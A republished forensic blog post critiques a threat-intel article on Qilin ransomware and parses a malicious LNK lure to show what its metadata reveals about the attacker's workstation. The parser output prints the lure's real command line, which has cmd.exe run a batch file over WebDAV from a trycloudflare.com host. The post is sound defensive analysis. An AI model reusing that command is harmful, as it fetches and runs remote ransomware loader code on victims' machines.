Close Menu
    DevStackTipsDevStackTips
    • Home
    • News & Updates
      1. Tech & Work
      2. View All

      The state of DevOps and AI: Not just hype

      September 1, 2025

      A Breeze Of Inspiration In September (2025 Wallpapers Edition)

      August 31, 2025

      10 Top Generative AI Development Companies for Enterprise Node.js Projects

      August 30, 2025

      Prompting Is A Design Act: How To Brief, Guide And Iterate With AI

      August 29, 2025

      Look out, Meta Ray-Bans! These AI glasses just raised over $1M in pre-orders in 3 days

      September 2, 2025

      Samsung ‘Galaxy Glasses’ powered by Android XR are reportedly on track to be unveiled this month

      September 2, 2025

      The M4 iPad Pro is discounted $100 as a last-minute Labor Day deal

      September 2, 2025

      Distribution Release: Linux From Scratch 12.4

      September 1, 2025
    • Development
      1. Algorithms & Data Structures
      2. Artificial Intelligence
      3. Back-End Development
      4. Databases
      5. Front-End Development
      6. Libraries & Frameworks
      7. Machine Learning
      8. Security
      9. Software Engineering
      10. Tools & IDEs
      11. Web Design
      12. Web Development
      13. Web Security
      14. Programming Languages
        • PHP
        • JavaScript
      Featured

      Enhanced Queue Job Control with Laravel’s ThrottlesExceptions failWhen() Method

      September 2, 2025
      Recent

      Enhanced Queue Job Control with Laravel’s ThrottlesExceptions failWhen() Method

      September 2, 2025

      August report 2025

      September 2, 2025

      Fake News Detection using Python Machine Learning (ML)

      September 1, 2025
    • Operating Systems
      1. Windows
      2. Linux
      3. macOS
      Featured

      Installing Proxmox on a Raspberry Pi to run Virtual Machines on it

      September 2, 2025
      Recent

      Installing Proxmox on a Raspberry Pi to run Virtual Machines on it

      September 2, 2025

      Download Transcribe! for Windows

      September 1, 2025

      Microsoft Fixes CertificateServicesClient (CertEnroll) Error in Windows 11

      September 1, 2025
    • Learning Resources
      • Books
      • Cheatsheets
      • Tutorials & Guides
    Home»Operating Systems»Ransomware artifacts

    Ransomware artifacts

    September 1, 2025

    I recently read through this FalconFeeds article on Qilin ransomware; being in DFIR consulting for as long as I have, and given how may ransomware incidents I’ve responded to or dug into, articles with titles like this attract my attention. I do not presume to know everything, and in fact, I’m very interested in the insights others provide based on their own investigations. As such, articles like this grab my attention. 

    As I read through the article, however, I become somewhat confused. Consider this quote from article:

    On closer examination, it is likely that the individual behind the Stack Overflow post was an infected victim rather than an attacker. This assessment is supported by the fact that another IP address 107[.]167[.]93[.]118 was observed with the same machine name (WIN-8OA3CCQAE4D) and identical configuration details. Such consistency across multiple, unrelated systems strongly indicates that the exploit automatically renames compromised hosts, leaving behind a uniform system identifier that inadvertently exposed itself in public forums. [emphasis added]

    Okay, this statement is interesting. At work/day job, for example, we’ve observed this workstation name a number of times, with different IP addresses. Again, these have been observed at different times, so the thinking is that either a threat actor used different means to connect to the Internet, or the workstation with the NetBIOS name/machineID is a virtual machine shared by several individuals. I think what really threw me was the statement “…the exploit…”; while the word “exploit” is mentioned several times in the article, there’s nothing that clearly delineates what that exploit is, nor how it was discovered or defined.

    Later in the blog post, we see the section illustrated in Figure 1.

    Figure 1: Blog excerpt

    If I read the blog post correctly, the author’s findings include the fact that the target victim is sent an LNK file by the threat actor; this is illustrated in Figure 2.

    Figure 2: Blog excerpt

    As anyone who’s followed my work for any amount of time is aware, I’m very interested in LNK files, and not just from the perspective of parsing them, but more so, using the embedded metadata (or lack thereof, as the case may be) to develop threat intelligence. As JP/CERT pointed out a long time ago, there’s a lot that an LNK file sent to a target can tell us about the developer’s workstation, including the machine ID/NetBIOS name. So far, to my knowledge, the only folks to make full use of LNK metadata to develop threat intelligence is Mandiant, in their Nov 2018 write-up on APT29 (see fig. 5 & 6).

    That being said, we know that many methods/APIs for creating LNK files automatically include the workstation name where the file is created in the LNK metadata. Since this affiliate is known (see Figure 2) to gain initial access to victim endpoints by sending a malicious LNK file, we know that the LNK file itself is not created on the target endpoint; as such, there is no reason to assume that there’s an “exploit” that changes the name of impacted endpoint. 

    While this is not something I’ve ever seen, nor heard of (again, I’ll be the first to tell you that I don’t know everything…), that doesn’t mean that it’s impossible. This definitely could happen, but the evidence presented doesn’t hold up in the face of artifact knowledge and experience.

    Using information from the FalconFeed article, I was able to locate and download a copy of the LNK file (MD5: 30fc1856c9e766a507015231a80879a8) and run it through my own LNK parser, and I got the following output:

    guid               {00021401-0000-0000-c000-000000000046}
    mtime              Fri Jan  3 15:02:21 2025 Z
    atime              Fri Jan  3 15:02:21 2025 Z
    ctime              Fri Jan  3 15:02:21 2025 Z
    basepath           C:WindowsSystem32cmd.exe   
    shitemidlist       My Computer/C:/Windows/System32/cmd.exe
    **Shell Items Details (times in UTC)**
      C:2021-05-08 08:06:52  M:2025-02-05 09:50:22  A:2025-02-05 09:50:22 Windows  (9)  [530/1]
      C:2021-05-08 08:06:52  M:2025-01-28 21:48:18  A:2025-01-28 21:48:18 System32  (9)  [3286/1]
      C:2025-01-03 15:02:22  M:2025-01-03 15:02:22  A:2025-01-03 15:02:22 cmd.exe  (9)  
    vol_sn             A409-2302                     
    vol_type           Fixed Disk                    
    commandline        /c “\cayman-inter-descending-processed.trycloudflare.com@SSLDavWWWRootkma.bat”
    iconfilename       %SystemRoot%System32SHELL32.dll
    hotkey             0x0                             
    showcmd            0x7  
                               
    ***LinkFlags***
    HasLinkTargetIDList|IsUnicode|HasLinkInfo|HasArguments|EnableTargetMetadata|HasIconLocation|HasRelativePath

    ***PropertyStoreDataBlock***
    GUID/ID pairs:
    {28636aa6-953d-11d2-b5d6-00c04fd918d0}/30     ParsingPath: C:UsersVillage Manor 2022Desktoposha3165 – Copy.pdf
    {446d16b1-8dad-4870-a748-402ea43d788c}/104    VolumeID: {ad378747-1bfd-4172-b598-a876b80c03d9}
    {b725f130-47ef-101a-a5f1-02608c9eebac}/10     ItemNameDisplay: osha3165 – Copy.pdf
    {b725f130-47ef-101a-a5f1-02608c9eebac}/12     Size: 16040764
    {b725f130-47ef-101a-a5f1-02608c9eebac}/14     DateModified: Tue Jul 17 20:17:44 2012 Z
    {b725f130-47ef-101a-a5f1-02608c9eebac}/15     DateCreated : Thu Feb  6 07:34:38 2025 Z
    {b725f130-47ef-101a-a5f1-02608c9eebac}/4      ItemType: Microsoft Edge PDF Document
    {e3e0584c-b788-4a5a-bb20-7f5a44c9acdd}/6      ItemFolderPathDisplay: C:Use

    ***KnownFolderDataBlock***
    GUID  : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}
    Folder: CSIDL_SYSTEM

    ***TrackerDataBlock***
    Machine ID            : win-8oa3ccqae4d 
    New Droid ID Time     : Fri Jan 31 14:29:24 2025 UTC
    New Droid ID Seq Num  : 5988
    New Droid    Node ID  : e0:09:88:3d:81:23
    Birth Droid ID Time   : Fri Jan 31 14:29:24 2025 UTC
    Birth Droid ID Seq Num: 5988
    Birth Droid Node ID   : e0:09:88:3d:81:23

    From the above output, and looking back to the Mandiant article, we can see a great deal about the developer’s endpoint, including the workstation name “win-8oa3ccqae4d”. We can also see a great deal of information that can likely be applied to the campaign, and by extension, be used to flesh out and provide context to both intrusion and threat intelligence.

    However, it seems clear that the author of the FalconFeeds article is missing some knowledge of Windows artifacts and file structures. Running an LNK file through ANY.RUN is a method to use, but it should not be the only method that’s used to develop information from that artifact. This also supports my thoughts CTI teams would benefit from a deep digital analysis skill sets, to develop and interpret artifacts from various systems and endpoints in a more thorough, correct manner. 

    Source: Read More 

    windows
    Facebook Twitter Reddit Email Copy Link
    Previous ArticleMicrosoft confirms Windows 11 version 25H2 won’t add new features
    Next Article Edge Canary on Android lets you play YouTube in the background; that too without Premium

    Related Posts

    Learning Resources

    Installing Proxmox on a Raspberry Pi to run Virtual Machines on it

    September 2, 2025
    Operating Systems

    Download Transcribe! for Windows

    September 1, 2025
    Leave A Reply Cancel Reply

    For security, use of Google's reCAPTCHA service is required which is subject to the Google Privacy Policy and Terms of Use.

    Continue Reading

    AI Won’t Kill UX, Our Habits Will: Why Designers Must Stay Intentional

    Web Development

    LWiAI Podcast #209 – OpenAI non-profit, US diffusion rules, AlphaEvolve

    Artificial Intelligence

    Building Engaging User Interfaces with SwiftUI [SUBSCRIBER]

    Learning Resources

    CVE-2025-5649 – SourceCodester Student Result Management System Remote Access Control Bypass

    Common Vulnerabilities and Exposures (CVEs)

    Highlights

    News & Updates

    Take-Two hints at $100 price tag for Grand Theft Auto VI — will it deliver on value?

    August 15, 2025

    Gaming prices soar, with Grand Theft Auto VI potentially launching at an unprecedented $100. Will…

    I played Capcom’s Pragmata, and it’s not what you expect

    June 12, 2025

    CVE-2025-5586 – WordPress Ajax Load More and Infinite Scroll Stored Cross-Site Scripting

    June 6, 2025

    CVE-2025-30018 – SAP SRM Information Disclosure

    May 13, 2025
    © DevStackTips 2025. All rights reserved.
    • Contact
    • Privacy Policy

    Type above and press Enter to search. Press Esc to cancel.